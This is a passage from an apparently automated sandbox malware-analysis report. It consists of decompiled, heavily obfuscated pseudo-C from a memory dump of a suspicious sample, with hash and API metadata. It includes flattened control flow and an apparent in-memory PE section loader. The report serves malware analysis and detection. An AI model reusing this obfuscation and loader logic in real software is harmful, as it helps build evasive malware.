                                                      				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
                                                      				while(_t336 != 0xd3df7e1) {
                                                      					if(_t336 == 0x132cc48f) {
                                                      						E0023F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
                                                      						_t336 = 0xd3df7e1;
                                                      						continue;
                                                      					}
                                                      					if(_t336 == 0x159b7bb7) {
                                                      						_push(_t336);
                                                      						_push(_t336);
                                                      						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
                                                      						_t368 = E00238736(0x1000);
                                                      						__eflags = _t368;
                                                      						_t336 =  !=  ? _t374 : 0xd3df7e1;
                                                      						continue;
                                                      					}
                                                      					if(_t336 == 0x18c2a499) {
                                                      						_t319 = E0023B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
                                                      						_t334 = _t319;
                                                      						_t380 = _t380 + 0x30;
                                                      						__eflags = _t319 - 0xffffffff;
                                                      						if(__eflags == 0) {
                                                      							L29:
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      						_t336 = 0x159b7bb7;
                                                      						continue;
                                                      					}
                                                      					if(_t336 == 0x1a0fbde3) {
                                                      						E00243E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
                                                      						_t322 = E002328CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
                                                      						_t378 = _t322;
                                                      						_t380 = _t380 + 0xc;
                                                      						_t336 = 0x18c2a499;
                                                      						 *((short*)(_t322 - 2)) = 0;
                                                      						continue;
                                                      					}
                                                      					if(_t336 == 0x262df760) {
                                                      						_t336 = 0x1a0fbde3;
                                                      						continue;
                                                      					}
                                                      					if(_t336 != _t374) {
                                                      						L28:
                                                      						__eflags = _t336 - 0x1c26cb40;
                                                      						if(__eflags != 0) {
                                                      							continue;
                                                      						}
                                                      						goto L29;
                                                      					}
                                                      					_t325 = E00246319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
                                                      					_t380 = _t380 + 0x30;
                                                      					if(_t325 == 0) {
                                                      						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                                      						L18:
                                                      						__eflags = _t326;
                                                      						if(__eflags == 0) {
                                                      							_t336 = _t374;
                                                      						} else {
                                                      							_t327 =  *0x24ca30; // 0x0
                                                      							E00248A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
                                                      							_t380 = _t380 + 0xc;
                                                      							_t336 = 0x132cc48f;
                                                      						}
                                                      						continue;
                                                      					}
                                                      					_t376 = _t368;
                                                      					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00238624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
                                                      						_t329 =  *_t376;
                                                      						if(_t329 == 0) {
                                                      							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                                      							L17:
                                                      							_t374 = 0x28650a76;
                                                      							goto L18;
                                                      						}
                                                      						_t376 = _t376 + _t329;
                                                      					}
                                                      					_t326 = 1;
                                                      					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
                                                      					goto L17;
                                                      				}
                                                      				E00244F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
                                                      				_t336 = 0x1c26cb40;
                                                      				goto L28;
                                                      			}


















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                                      • API String ID: 823142352-1348462970
                                                      • Opcode ID: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
                                                      • Instruction ID: 6f425dee6e127b4917b8fc6cbd7d33fe8a1ccfb45088ea1c7c2e752b8fe815bf
                                                      • Opcode Fuzzy Hash: f09502523fef88919c0c1632ccc10a26b21da76b79abd427d4cf3bcea4caab25
                                                      • Instruction Fuzzy Hash: 02F131B15193819FE768CF25C54AA5BBBF1BBC4708F108A1DF1DA862A0D7B58919CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00246DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v4;
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				void* _t224;
                                                      				void* _t243;
                                                      				void* _t256;
                                                      				void* _t264;
                                                      				void* _t288;
                                                      				signed int _t290;
                                                      				signed int _t291;
                                                      				signed int _t292;
                                                      				signed int _t293;
                                                      				signed int _t294;
                                                      				void* _t295;
                                                      				void* _t298;
                                                      				signed int* _t301;
                                                      				signed int* _t302;
                                                      				signed int* _t303;
                                                      
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(0);
                                                      				_push(3);
                                                      				_push(__ecx);
                                                      				E0023602B(_t224);
                                                      				_v4 = _v4 & 0x00000000;
                                                      				_v8 = 0x15bbba;
                                                      				_v72 = 0x7e44;
                                                      				_t290 = 0x3e;
                                                      				_v72 = _v72 * 0x56;
                                                      				_v72 = _v72 | 0xe97810d5;
                                                      				_v72 = _v72 ^ 0xe97a6add;
                                                      				_v56 = 0x50ea;
                                                      				_v56 = _v56 >> 9;
                                                      				_v56 = _v56 >> 8;
                                                      				_v56 = _v56 ^ 0x00008000;
                                                      				_v100 = 0x7422;
                                                      				_v100 = _v100 + 0xffff8791;
                                                      				_v100 = _v100 ^ 0x724a15f0;
                                                      				_v100 = _v100 + 0xd05;
                                                      				_v100 = _v100 ^ 0x8db5db48;
                                                      				_v48 = 0x2edd;
                                                      				_v48 = _v48 / _t290;
                                                      				_v48 = _v48 ^ 0x00005532;
                                                      				_v76 = 0xee3f;
                                                      				_v76 = _v76 + 0xffffe6cd;
                                                      				_v76 = _v76 + 0xffff5ce1;
                                                      				_v76 = _v76 ^ 0x00006965;
                                                      				_v104 = 0xa36d;
                                                      				_v104 = _v104 << 0xc;
                                                      				_v104 = _v104 + 0x5d19;
                                                      				_v104 = _v104 >> 1;
                                                      				_v104 = _v104 ^ 0x051bebf0;
                                                      				_v52 = 0xa852;
                                                      				_v52 = _v52 + 0xddb7;
                                                      				_v52 = _v52 ^ 0x00019bba;
                                                      				_v96 = 0xa4e6;
                                                      				_v96 = _v96 | 0xa6d42a45;
                                                      				_t291 = 0x2e;
                                                      				_v96 = _v96 * 0x22;
                                                      				_v96 = _v96 << 1;
                                                      				_v96 = _v96 ^ 0x507e3c16;
                                                      				_v40 = 0x2ce2;
                                                      				_v40 = _v40 + 0xffffe435;
                                                      				_v40 = _v40 ^ 0x00002c9b;
                                                      				_v64 = 0xad5e;
                                                      				_v64 = _v64 * 0xd;
                                                      				_v64 = _v64 >> 0xf;
                                                      				_v64 = _v64 ^ 0x00006dfc;
                                                      				_v68 = 0x15e2;
                                                      				_v68 = _v68 << 4;
                                                      				_v68 = _v68 + 0x971e;
                                                      				_v68 = _v68 ^ 0x0001ffd3;
                                                      				_v28 = 0x5912;
                                                      				_v28 = _v28 | 0xb77a8e9e;
                                                      				_v28 = _v28 ^ 0xb77a927a;
                                                      				_v32 = 0xb0a1;
                                                      				_v32 = _v32 >> 6;
                                                      				_v32 = _v32 ^ 0x000014c1;
                                                      				_v36 = 0x1527;
                                                      				_v36 = _v36 / _t291;
                                                      				_v36 = _v36 ^ 0x000058cb;
                                                      				_v92 = 0x32e5;
                                                      				_v92 = _v92 * 0x31;
                                                      				_v92 = _v92 + 0xffff00ec;
                                                      				_v92 = _v92 << 8;
                                                      				_v92 = _v92 ^ 0x08be8a0d;
                                                      				_v20 = 0xbd6f;
                                                      				_v20 = _v20 + 0xab45;
                                                      				_v20 = _v20 ^ 0x000148c7;
                                                      				_v24 = 0x6d6f;
                                                      				_t292 = 0x6d;
                                                      				_v24 = _v24 / _t292;
                                                      				_v24 = _v24 ^ 0x00002132;
                                                      				_v84 = 0xac46;
                                                      				_t293 = 0x2f;
                                                      				_v84 = _v84 * 0x6c;
                                                      				_v84 = _v84 + 0xe89f;
                                                      				_v84 = _v84 >> 7;
                                                      				_v84 = _v84 ^ 0x0000aacf;
                                                      				_v88 = 0x7aeb;
                                                      				_v88 = _v88 * 0x1d;
                                                      				_v88 = _v88 >> 0xb;
                                                      				_t294 = 0x7f;
                                                      				_v88 = _v88 / _t293;
                                                      				_v88 = _v88 ^ 0x00001cd5;
                                                      				_v60 = 0x8b82;
                                                      				_v60 = _v60 + 0xffffb5bd;
                                                      				_v60 = _v60 * 0x35;
                                                      				_v60 = _v60 ^ 0x000df53e;
                                                      				_v12 = 0x733f;
                                                      				_v12 = _v12 >> 3;
                                                      				_v12 = _v12 ^ 0x000065d0;
                                                      				_v16 = 0x6f84;
                                                      				_v16 = _v16 | 0x29e4272c;
                                                      				_v16 = _v16 ^ 0x29e452e1;
                                                      				_v80 = 0x4249;
                                                      				_v80 = _v80 >> 0xb;
                                                      				_v80 = _v80 / _t294;
                                                      				_v80 = _v80 >> 3;
                                                      				_v80 = _v80 ^ 0x00004a04;
                                                      				_v44 = 0x4ba5;
                                                      				_v44 = _v44 + 0xffffabaf;
                                                      				_v44 = _v44 ^ 0xfffff714;
                                                      				_t243 = E00243811(__ecx, _v48, _a8, _v76, _v104, _v52);
                                                      				_t256 = _t243;
                                                      				_t301 =  &(( &_v104)[0xb]);
                                                      				if(_t256 == 0) {
                                                      					return _t243;
                                                      				}
                                                      				_t295 = E00237EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
                                                      				_t302 =  &(_t301[6]);
                                                      				if(_t295 == 0) {
                                                      					L7:
                                                      					return _t295;
                                                      				}
                                                      				E00242674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
                                                      				_t303 =  &(_t302[5]);
                                                      				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
                                                      				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
                                                      				while(_t288 < _t298) {
                                                      					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
                                                      					E00242674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
                                                      					_t303 =  &(_t303[5]);
                                                      					_t288 = _t288 + 0x28;
                                                      				}
                                                      				E0023F7D8(_t295, _t256);
                                                      				_t264 = _t295;
                                                      				if(E0023E05A(_t264, _t256) == 0) {
                                                      					_push(_t264);
                                                      					E00244FE8(_v56, _t295, _v60, _v12, _v16, _v80);
                                                      					_t295 = 0;
                                                      				}
                                                      				goto L7;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                                      • API String ID: 0-3377435326
                                                      • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                                      • Instruction ID: fb58a9e04fa6574d5e5616dac5a90d4baf9d6f3e43beb76c1edab8c68f0e0aa3
                                                      • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                                      • Instruction Fuzzy Hash: 7BB123725187809FE368CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C559CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00236D9F() {
                                                      				char _v520;
                                                      				char _v1040;
                                                      				signed int _v1044;
                                                      				intOrPtr _v1048;
                                                      				char _v1052;
                                                      				signed int _v1056;
                                                      				signed int _v1060;
                                                      				signed int _v1064;
                                                      				signed int _v1068;
                                                      				signed int _v1072;
                                                      				signed int _v1076;
                                                      				signed int _v1080;
                                                      				signed int _v1084;
                                                      				signed int _v1088;
                                                      				signed int _v1092;
                                                      				signed int _v1096;
                                                      				signed int _v1100;
                                                      				signed int _v1104;
                                                      				signed int _v1108;
                                                      				signed int _v1112;
                                                      				signed int _v1116;
                                                      				signed int _v1120;
                                                      				signed int _v1124;
                                                      				signed int _v1128;
                                                      				signed int _v1132;
                                                      				signed int _v1136;
                                                      				signed int _v1140;
                                                      				signed int _v1144;
                                                      				signed int _v1148;
                                                      				signed int _v1152;
                                                      				signed int _v1156;
                                                      				signed int _v1160;
                                                      				signed int _v1164;
                                                      				signed int _v1168;
                                                      				signed int _v1172;
                                                      				signed int _v1176;
                                                      				signed int _v1180;
                                                      				signed int _v1184;
                                                      				signed int _v1188;
                                                      				signed int _v1192;
                                                      				signed int _v1196;
                                                      				signed int _v1200;
                                                      				signed int _v1204;
                                                      				signed int _v1208;
                                                      				signed int _v1212;
                                                      				signed int _v1216;
                                                      				void* _t365;
                                                      				void* _t366;
                                                      				intOrPtr _t368;
                                                      				signed int _t376;
                                                      				intOrPtr* _t378;
                                                      				void* _t379;
                                                      				signed int _t384;
                                                      				intOrPtr _t385;
                                                      				intOrPtr* _t386;
                                                      				signed int _t387;
                                                      				signed int _t388;
                                                      				signed int _t389;
                                                      				signed int _t390;
                                                      				signed int _t391;
                                                      				void* _t392;
                                                      				void* _t399;
                                                      				void* _t405;
                                                      				intOrPtr _t419;
                                                      				void* _t427;
                                                      				signed int* _t432;
                                                      
                                                      				_t432 =  &_v1216;
                                                      				_v1048 = 0x446f36;
                                                      				_v1044 = 0;
                                                      				_v1168 = 0x4c2;
                                                      				_v1168 = _v1168 + 0x4422;
                                                      				_v1168 = _v1168 << 0xe;
                                                      				_v1168 = _v1168 ^ 0x12390029;
                                                      				_v1108 = 0xe6e3;
                                                      				_v1108 = _v1108 << 7;
                                                      				_v1108 = _v1108 ^ 0x80737181;
                                                      				_v1140 = 0x5a14;
                                                      				_v1140 = _v1140 + 0xffff6ad9;
                                                      				_v1140 = _v1140 + 0x3f04;
                                                      				_v1140 = _v1140 ^ 0x000003f3;
                                                      				_v1152 = 0xde22;
                                                      				_v1056 = 0;
                                                      				_t427 = 0x1cf5a099;
                                                      				_t387 = 0xc;
                                                      				_v1152 = _v1152 / _t387;
                                                      				_v1152 = _v1152 + 0x1888;
                                                      				_v1152 = _v1152 ^ 0x00005d3c;
                                                      				_v1072 = 0x75ae;
                                                      				_t388 = 0x55;
                                                      				_v1072 = _v1072 * 0x39;
                                                      				_v1072 = _v1072 ^ 0x001a1469;
                                                      				_v1160 = 0x6360;
                                                      				_v1160 = _v1160 << 0xa;
                                                      				_v1160 = _v1160 >> 0xe;
                                                      				_v1160 = _v1160 ^ 0x00005ec5;
                                                      				_v1204 = 0x5583;
                                                      				_v1204 = _v1204 ^ 0x85366cb5;
                                                      				_v1204 = _v1204 | 0x8d22480f;
                                                      				_v1204 = _v1204 + 0xffffa345;
                                                      				_v1204 = _v1204 ^ 0x8d362c42;
                                                      				_v1076 = 0x4501;
                                                      				_v1076 = _v1076 ^ 0x7eb858e4;
                                                      				_v1076 = _v1076 ^ 0x7eb84390;
                                                      				_v1176 = 0x178a;
                                                      				_v1176 = _v1176 >> 0xe;
                                                      				_v1176 = _v1176 * 0xb;
                                                      				_v1176 = _v1176 ^ 0x00005407;
                                                      				_v1196 = 0x1155;
                                                      				_v1196 = _v1196 << 0x10;
                                                      				_v1196 = _v1196 ^ 0x99db21f3;
                                                      				_v1196 = _v1196 << 8;
                                                      				_v1196 = _v1196 ^ 0x8e21cf72;
                                                      				_v1096 = 0x9447;
                                                      				_v1096 = _v1096 + 0xfffff759;
                                                      				_v1096 = _v1096 ^ 0x0000f307;
                                                      				_v1136 = 0x5f84;
                                                      				_v1136 = _v1136 | 0xcddc780f;
                                                      				_v1136 = _v1136 >> 5;
                                                      				_v1136 = _v1136 ^ 0x066ef8af;
                                                      				_v1104 = 0x8d89;
                                                      				_v1104 = _v1104 + 0xffff49e8;
                                                      				_v1104 = _v1104 ^ 0xffff9178;
                                                      				_v1060 = 0xefb9;
                                                      				_v1060 = _v1060 + 0xc1e0;
                                                      				_v1060 = _v1060 ^ 0x0001802f;
                                                      				_v1088 = 0x4e92;
                                                      				_v1088 = _v1088 / _t388;
                                                      				_v1088 = _v1088 ^ 0x00003d65;
                                                      				_v1180 = 0x8957;
                                                      				_v1180 = _v1180 ^ 0x92844c79;
                                                      				_v1180 = _v1180 >> 0xd;
                                                      				_v1180 = _v1180 + 0x6937;
                                                      				_v1180 = _v1180 ^ 0x0004ca08;
                                                      				_v1188 = 0xa977;
                                                      				_v1188 = _v1188 + 0xffff4939;
                                                      				_t389 = 0x2a;
                                                      				_v1188 = _v1188 / _t389;
                                                      				_v1188 = _v1188 + 0xff8b;
                                                      				_v1188 = _v1188 ^ 0x06195dc5;
                                                      				_v1184 = 0xd80a;
                                                      				_v1184 = _v1184 << 0xd;
                                                      				_v1184 = _v1184 | 0x4fc46678;
                                                      				_v1184 = _v1184 + 0xffff2565;
                                                      				_v1184 = _v1184 ^ 0x5fc4ec42;
                                                      				_v1144 = 0xea63;
                                                      				_v1144 = _v1144 >> 0xa;
                                                      				_v1144 = _v1144 + 0xffff7a6a;
                                                      				_v1144 = _v1144 ^ 0xffff3b56;
                                                      				_v1064 = 0xbe27;
                                                      				_v1064 = _v1064 << 0xc;
                                                      				_v1064 = _v1064 ^ 0x0be2654a;
                                                      				_v1100 = 0x1945;
                                                      				_v1100 = _v1100 ^ 0xac55a11c;
                                                      				_v1100 = _v1100 ^ 0xac55a0be;
                                                      				_v1156 = 0x9792;
                                                      				_v1156 = _v1156 << 3;
                                                      				_v1156 = _v1156 + 0xffff9949;
                                                      				_v1156 = _v1156 ^ 0x00042150;
                                                      				_v1124 = 0x4510;
                                                      				_v1124 = _v1124 + 0xffff8613;
                                                      				_v1124 = _v1124 | 0x934ed599;
                                                      				_v1124 = _v1124 ^ 0xffffb057;
                                                      				_v1208 = 0xd7d3;
                                                      				_t390 = 0x4a;
                                                      				_v1208 = _v1208 * 0x29;
                                                      				_v1208 = _v1208 << 7;
                                                      				_v1208 = _v1208 | 0x9b57b5c9;
                                                      				_v1208 = _v1208 ^ 0x9b5f9b7a;
                                                      				_v1164 = 0x3cc8;
                                                      				_v1164 = _v1164 + 0xffff7a64;
                                                      				_v1164 = _v1164 + 0xffff31bf;
                                                      				_v1164 = _v1164 ^ 0xfffea90e;
                                                      				_v1092 = 0xe652;
                                                      				_v1092 = _v1092 << 0xf;
                                                      				_v1092 = _v1092 ^ 0x732967ec;
                                                      				_v1200 = 0xc0e1;
                                                      				_v1200 = _v1200 ^ 0xc04a3a1a;
                                                      				_v1200 = _v1200 | 0x7efbebea;
                                                      				_v1200 = _v1200 ^ 0xfefb9216;
                                                      				_v1192 = 0x2d8c;
                                                      				_v1192 = _v1192 >> 7;
                                                      				_v1192 = _v1192 ^ 0x302961fe;
                                                      				_v1192 = _v1192 << 0xf;
                                                      				_v1192 = _v1192 ^ 0xb0d2939c;
                                                      				_v1132 = 0xbcbe;
                                                      				_v1132 = _v1132 | 0x9a03aa26;
                                                      				_v1132 = _v1132 << 4;
                                                      				_v1132 = _v1132 ^ 0xa03bfed3;
                                                      				_v1068 = 0x5b9d;
                                                      				_v1068 = _v1068 / _t390;
                                                      				_v1068 = _v1068 ^ 0x00000144;
                                                      				_v1172 = 0x2743;
                                                      				_v1172 = _v1172 >> 9;
                                                      				_v1172 = _v1172 + 0x7fd0;
                                                      				_v1172 = _v1172 ^ 0x00002a87;
                                                      				_v1116 = 0x6969;
                                                      				_t391 = 0x76;
                                                      				_v1116 = _v1116 / _t391;
                                                      				_v1116 = _v1116 << 0xa;
                                                      				_v1116 = _v1116 ^ 0x0003c98c;
                                                      				_v1212 = 0xb804;
                                                      				_v1212 = _v1212 + 0xffff4ff5;
                                                      				_v1212 = _v1212 << 0xd;
                                                      				_v1212 = _v1212 + 0x7e88;
                                                      				_v1212 = _v1212 ^ 0x00ffdfa3;
                                                      				_v1084 = 0x6753;
                                                      				_v1084 = _v1084 | 0x97d0336a;
                                                      				_v1084 = _v1084 ^ 0x97d00d97;
                                                      				_v1148 = 0xef82;
                                                      				_v1148 = _v1148 >> 2;
                                                      				_v1148 = _v1148 << 2;
                                                      				_v1148 = _v1148 ^ 0x0000cb2e;
                                                      				_v1112 = 0x5852;
                                                      				_v1112 = _v1112 >> 7;
                                                      				_v1112 = _v1112 ^ 0xfa80e3bf;
                                                      				_v1112 = _v1112 ^ 0xfa8084b8;
                                                      				_v1120 = 0x62fa;
                                                      				_v1120 = _v1120 >> 0xa;
                                                      				_v1120 = _v1120 << 3;
                                                      				_v1120 = _v1120 ^ 0x000065d7;
                                                      				_t384 = _v1056;
                                                      				_v1128 = 0x8139;
                                                      				_v1128 = _v1128 + 0xffff21ec;
                                                      				_v1128 = _v1128 ^ 0xad93553f;
                                                      				_v1128 = _v1128 ^ 0x526c8c2f;
                                                      				_v1080 = 0x16f9;
                                                      				_v1080 = _v1080 + 0xffffafc8;
                                                      				_v1080 = _v1080 ^ 0xffff87da;
                                                      				_v1216 = 0xd107;
                                                      				_v1216 = _v1216 << 0xa;
                                                      				_v1216 = _v1216 >> 0xb;
                                                      				_v1216 = _v1216 | 0x40b78e0e;
                                                      				_v1216 = _v1216 ^ 0x40b7ee8e;
                                                      				while(1) {
                                                      					L1:
                                                      					_t392 = 0x5c;
                                                      					while(1) {
                                                      						L2:
                                                      						_t365 = 0x201e73d8;
                                                      						do {
                                                      							L3:
                                                      							if(_t427 == 0xb9056ba) {
                                                      								_push(_v1176);
                                                      								_t366 = E0024889D(0x24c930, _v1076, __eflags);
                                                      								_t368 =  *0x24ca2c; // 0x698300
                                                      								__eflags = _t368 + 0x230;
                                                      								_t419 =  *0x24ca2c; // 0x698300
                                                      								E002329E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
                                                      								E00242025(_v1088, _t366, _v1180, _v1188);
                                                      								_t432 =  &(_t432[0xc]);
                                                      								_t427 = 0x176c6394;
                                                      								goto L17;
                                                      							} else {
                                                      								if(_t427 == 0x176c6394) {
                                                      									_t385 =  *0x24ca2c; // 0x698300
                                                      									_t386 = _t385 + 0x230;
                                                      									while(1) {
                                                      										__eflags =  *_t386 - _t392;
                                                      										if(__eflags == 0) {
                                                      											break;
                                                      										}
                                                      										_t386 = _t386 + 2;
                                                      										__eflags = _t386;
                                                      									}
                                                      									_t384 = _t386 + 2;
                                                      									_t427 = 0x2c3250cc;
                                                      									goto L2;
                                                      								} else {
                                                      									if(_t427 == 0x1cf5a099) {
                                                      										_push(_t392);
                                                      										_push(_t392);
                                                      										E0023C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
                                                      										_t432 =  &(_t432[7]);
                                                      										_t427 = 0xb9056ba;
                                                      										goto L1;
                                                      									} else {
                                                      										if(_t427 == 0x1e86e44b) {
                                                      											E002365A2(_v1052, _v1112, _v1120, _v1128, _v1080);
                                                      										} else {
                                                      											if(_t427 == _t365) {
                                                      												_t376 = E00240ADC( &_v1040, _v1132, _v1068);
                                                      												_pop(_t399);
                                                      												_t378 = E00231AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
                                                      												_t432 =  &(_t432[9]);
                                                      												__eflags = _t378;
                                                      												_t427 = 0x1e86e44b;
                                                      												_v1056 = 0 | __eflags == 0x00000000;
                                                      												while(1) {
                                                      													L1:
                                                      													_t392 = 0x5c;
                                                      													L2:
                                                      													_t365 = 0x201e73d8;
                                                      													goto L3;
                                                      												}
                                                      											} else {
                                                      												_t440 = _t427 - 0x2c3250cc;
                                                      												if(_t427 == 0x2c3250cc) {
                                                      													_push(_v1144);
                                                      													_t379 = E0024889D(0x24c9d0, _v1184, _t440);
                                                      													_pop(_t405);
                                                      													E00243EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x24c9d0, _v1124, _v1208, 0x24c9d0, _v1164, 0x24c9d0, _v1140, _v1108,  &_v1052);
                                                      													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
                                                      													E00242025(_v1092, _t379, _v1200, _v1192);
                                                      													_t432 =  &(_t432[0xf]);
                                                      													L17:
                                                      													_t365 = 0x201e73d8;
                                                      													_t392 = 0x5c;
                                                      												}
                                                      												goto L18;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L21:
                                                      							return _v1056;
                                                      							L18:
                                                      						} while (_t427 != 0x22b0460c);
                                                      						goto L21;
                                                      					}
                                                      				}
                                                      			}






































































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
                                                      • API String ID: 1514166925-3192994148
                                                      • Opcode ID: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
                                                      • Instruction ID: fab8afe8c8a666489120921d993541215d9e2d5878b52d534482f681a22b0ddc
                                                      • Opcode Fuzzy Hash: 359d5774a81b166ce332722f6b2da11cc746ba0cb66d68a7f4fc9c412c1fa46b
                                                      • Instruction Fuzzy Hash: 880215B15197819FE3A5CF65C84AA4BBBE1FBC5748F10890CF2D9862A0D7B58919CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E0023BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
                                                      				intOrPtr _v60;
                                                      				char _v68;
                                                      				char _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				signed int _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				signed int _v144;
                                                      				signed int _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				char _t284;
                                                      				signed int _t317;
                                                      				void* _t322;
                                                      				signed int _t349;
                                                      				signed int _t350;
                                                      				signed int _t351;
                                                      				signed int _t352;
                                                      				signed int _t353;
                                                      				signed int _t354;
                                                      				signed int _t355;
                                                      				intOrPtr _t357;
                                                      				signed int* _t360;
                                                      
                                                      				_push(_a28);
                                                      				_push(0);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(0);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				_t284 = E0023602B(0);
                                                      				_v72 = _t284;
                                                      				_t357 = _t284;
                                                      				_v176 = 0x3707;
                                                      				_t360 =  &(( &_v188)[9]);
                                                      				_v176 = _v176 << 3;
                                                      				_t322 = 0x3701c77e;
                                                      				_t349 = 0x1b;
                                                      				_v176 = _v176 * 0x3b;
                                                      				_v176 = _v176 ^ 0x9e3c13fc;
                                                      				_v176 = _v176 ^ 0x9e596314;
                                                      				_v152 = 0x78a7;
                                                      				_v152 = _v152 + 0x292e;
